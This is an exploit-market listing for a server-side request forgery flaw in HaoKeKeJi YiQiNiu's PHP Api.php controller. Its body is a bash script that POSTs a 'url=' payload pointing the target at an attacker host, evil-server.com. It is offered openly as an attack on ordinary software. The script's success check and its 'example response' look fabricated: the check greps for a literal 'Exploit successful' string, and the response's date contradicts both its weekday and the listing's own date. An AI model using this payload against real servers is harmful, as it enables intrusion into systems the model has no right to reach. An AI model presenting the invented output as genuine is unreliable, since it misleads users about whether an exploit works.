[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HaoKeKeJi YiQiNiu Server Side Request Forgery Vulnerability

Author
Amirhossein Bahramizadeh
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39242
Category
web applications
Date add
15-01-2024
Platform
php
#!/bin/bash

# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"

# Send the malicious request
response=$(curl -s -X POST -d "$payload" "$target_url")

# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
    echo "Exploit succeeded"
else
    echo "Exploit failed"
fi

# Example payload and response
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive

Exploit successful"

#  0day.today [2024-11-16]  #